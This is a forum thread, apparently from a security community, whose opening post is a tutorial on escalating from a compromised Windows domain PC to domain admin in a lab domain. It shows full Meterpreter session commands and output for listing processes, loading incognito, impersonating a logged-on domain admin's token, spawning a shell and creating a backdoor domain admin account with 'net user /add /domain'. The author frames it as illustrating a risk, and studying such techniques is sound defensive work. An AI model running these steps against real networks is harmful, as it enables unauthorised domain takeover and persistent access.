Results 1 to 3 of 3

Thread: How to create a domain user admin thru an exploited domain PC

  1. #1
    Junior Member
    Join Date
    Jun 2012
    Location
    127.0.0.1
    Posts
    25

    Default How to create a domain user admin thru an exploited domain PC

    Hi all!
    the "how to" forum is closed, so I post here.

    This is how to create a domain user admin thru an exploited domain PC with local machine administration rights.

    The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
    The exploited machine is joined to the domain and we got a meterpreter shell with local PC admin rights.

    Basic command used after exploit:
    Find process --> ps
    Load incognito extension --> use incognito
    Listing available tokens --> list_tokens -u
    Impersonate token --> impersonate_token <token>
    Get a command shell using the token --> execute -f cmd.exe -i -t -H -c
    Add a domain User --> net user USER PASSWORD /add /domain
    Add the creted user in domain admin --> net localgroup administrators USER /add /domain

    Interact with session 1 and list process:
    Code:
    msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...
    
    meterpreter > ps
    
    Process list
    ============
    
     PID   Name              Arch  Session  User                           Path
     ---   ----              ----  -------  ----                           ----
     0     [System Process]
     4     System            x86   0        NT AUTHORITY\SYSTEM
     1736  smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
     1788  csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
     1812  winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
     1856  services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
     1868  lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
     2032  ibmpmsvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
     176   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
     312   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
     404   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
     508   EvtEng.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
     604   S24EvMon.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
     824   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
     848   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
     1228  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
     1304  svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
     1344  AcPrfMgrSvc.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
     1416  btwdins.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
     1484  RegSrvc.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
     1676  TpKmpSvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
     180   AcSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
     700   MOMService.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
     224   wmiprvse.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
     948   SvcGuiHlpr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
     2580  alg.exe           x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
     3276  explorer.exe      x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
     3908  tp4mon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
     1112  igfxtray.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
     1124  hkcmd.exe         x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
     2192  igfxpers.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
     1860  ACTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
     2596  ACWLIcon.exe      x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
     2700  smax4pnp.exe      x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
     2904  ctfmon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
     3076  BTTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
     3572  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
     2912  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
     1472  rundll32.exe      x86   0        LAB\admin                 C:\WINDOWS\system32\rundll32.exe                           <---------- Look at these
     1256  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
     3044  msiexec.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
     3224  rundll32.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe
    Load extension, list token and impersonate domain admin
    Code:
    meterpreter > use incognito
    Loading extension incognito...success.
    meterpreter > list_tokens -u
    
    Delegation Tokens Available
    ========================================
    LAB\admin
    LAB\utente1
    NT AUTHORITY\SERVIZIO DI RETE
    NT AUTHORITY\SERVIZIO LOCALE
    NT AUTHORITY\SYSTEM
    
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ACCESSO ANONIMO
    
    meterpreter > impersonate_token lab\\admin          <---------- Double backslash DOMAIN\\name 
    [+] Delegation token available
    [+] Successfully impersonated user LAB\admin
    
    meterpreter > getuid
    Server username: lab\admin
    Get a domain admin shell
    Code:
    meterpreter > execute -f cmd.exe -i -t -H -c
    Process 3804 created.
    Channel 1 created.
    Microsoft Windows XP [Versione 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    
    C:\WINDOWS\system32>
    Create new domain user and join to the domain admins group
    Code:
    C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
    net user TestUser Passw0rd /add /domain
    La richiesta verrā elaborata dal controller di dominio per il dominio lab.local.
    
    Esecuzione comando riuscita.
    
    
    C:\WINDOWS\system32>net localgroup /domain
    net localgroup /domain
    La richiesta verrā elaborata dal controller di dominio per il dominio lab.local.
    
    
    Alias per \\LABServer07.lab.local
    
    -------------------------------------------------------------------------------
    *Accesso compatibile precedente a Windows 2000
    *Accesso DCOM a Servizi certificati
    *Account Operators
    *Administrators
    *Backup Operators
    *Cert Publishers
    *Cryptographic Operators
    *Distributed COM Users
    *DnsAdmins
    *Gruppo di accesso autorizzazione Windows
    *Guests
    *IIS_IUSRS
    *Incoming Forest Trust Builders
    *Lettori registri eventi
    *Network Configuration Operators
    *Ogg. autorizzati a replica passw. in controller sola lettura
    *Ogg. non autoriz. a replica passw. in controller sola lettura
    *Performance Log Users
    *Performance Monitor Users
    *Print Operators
    *Replicator
    *Server licenze di Terminal Server
    *Server Operators
    *Server RAS e IAS
    *Users
    *Utenti desktop remoto
    Esecuzione comando riuscita.
    
    C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
    net localgroup administrators TestUser /add /domain
    La richiesta verrā elaborata dal controller di dominio per il dominio lab.local.
    
    Esecuzione comando riuscita.
    Obviously the victim PC is an Italian version, so if you read "esecuzione comando riuscita" you have to read "Command completed successfully"
    Thanks to all

  2. #2
    Just burned his ISO
    Join Date
    Jul 2012
    Posts
    1

    Question Re: How to create a domain user admin thru an exploited domain PC

    Greate Job!
    ===========================
    You're lucky,Baby !

    If you have only a normal domain user and a local administrator,what you will do。

    What I mean is that there is no domain admins logged on the PC you've hacked。

  3. #3
    Junior Member
    Join Date
    Jun 2012
    Location
    127.0.0.1
    Posts
    25

    Default Re: How to create a domain user admin thru an exploited domain PC

    This is the purpose of the tutorial: illustrate the risk to use a domain admin user to run prosess remotely in a domain, such as policy or script. If there is not the token "you can't" create a domain user.
    Last edited by SilicaG; 07-03-2012 at 08:27 AM.

Similar Threads

  1. Local Admin -> Domain Admin
    By QuicKSwitcH in forum Beginners Forum
    Replies: 2
    Last Post: 06-04-2010, 07:54 PM
  2. need good resources to learn about group policy domain, admin
    By KingMidas in forum OLD General IT Discussion
    Replies: 1
    Last Post: 01-20-2010, 01:30 AM
  3. Local Admin --> Domain Admin ??
    By imported_l1nuxant_ee in forum OLD Specialist Topics
    Replies: 14
    Last Post: 07-14-2009, 07:30 PM
  4. Social Engineering to gain VPN and domain admin
    By williamc in forum OLD Pentesting
    Replies: 19
    Last Post: 12-22-2008, 07:55 AM
  5. Server 2008 Domain Admin Password Recovery
    By Dudeman02379 in forum OLD General IT Discussion
    Replies: 19
    Last Post: 11-02-2008, 06:59 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •